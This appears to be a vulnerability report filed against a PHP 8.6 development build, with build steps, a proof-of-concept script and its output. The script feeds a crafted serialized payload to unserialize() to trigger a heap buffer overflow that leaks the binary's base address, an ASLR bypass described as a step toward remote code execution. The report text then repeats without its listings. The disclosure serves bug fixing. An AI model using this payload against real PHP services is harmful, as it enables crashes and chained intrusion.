Description
Version: PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Researcher: Igor Sak-Sakovskiy (Positive Technologies)
Language assembly and compilation.
Listing 1. Language assembly and compilation.
$ git clone https://github.com/php/php-src.git
$ cd php-src
$ ./buildconf
$ ./configure
$ make -j8
$ ./sapi/cli/php -v
PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Copyright © The PHP Group and Contributors
Zend Engine v4.6.0-dev, Copyright © Zend by Perforce
with Zend OPcache v8.6.0-dev, Copyright ©, by Zend by Perforce
Listing 2.
<?php
$idx = 0;
set_error_handler(function($code, $msg) use (&$idx) {
if (!preg_match('/frame (\d+)/', $msg, $m)) return true;
if ($idx++ !== 3) return true;
$addr = (int)$m[1];
$base = $addr - 0x222eb88;
printf("text_base = 0x%x\n", $base);
printf("uninitialized_bucket = 0x%x (text_base + 0x222eb88)\n", $addr);
return true;
});
$n = "\x00";
unserialize(
'O:9:"Exception":1:{' .
's:16:"' . $n . 'Exception' . $n . 'trace";' .
'O:8:"stdClass":2:{' .
's:1:"0";' .
'O:10:"SplMaxHeap":2:{' .
'i:0;a:0:{}' .
'i:1;a:2:{' .
's:5:"flags";i:0;' .
's:13:"heap_elements";a:2:{i:0;s:0:"";i:1;R:1;}' .
'}' .
'}' .
'z' .
'}}'
);
?>
Executing this PHP code results in memory address leak, enabling ASLR bypass. Combined with other vulnerabilities (e.g., use-after-free), this can lead to Remote Code Execution (RCE).
Listing 3.
$ ./php-src/sapi/cli/php poc.php
text_base = 0x1d5fddd1479
uninitialized_bucket = 0x1d600000001 (text_base + 0x222eb88)
Segmentation fault (core dumped)
Heap buffer overflow allows reading memory beyond allocated bounds, potentially leaking PHP binary base address. This ASLR bypass is a critical step towards RCE when combined with other vulnerabilities. In ZTS mode, this can stop all currently served requests in the process.
PHP Version
PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Operating System
No response
Description
Version: PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Researcher: Igor Sak-Sakovskiy (Positive Technologies)
Language assembly and compilation.
Listing 1. Language assembly and compilation.
Listing 2.
Executing this PHP code results in memory address leak, enabling ASLR bypass. Combined with other vulnerabilities (e.g., use-after-free), this can lead to Remote Code Execution (RCE).
Listing 3.
Heap buffer overflow allows reading memory beyond allocated bounds, potentially leaking PHP binary base address. This ASLR bypass is a critical step towards RCE when combined with other vulnerabilities. In ZTS mode, this can stop all currently served requests in the process.
PHP Version
Operating System
No response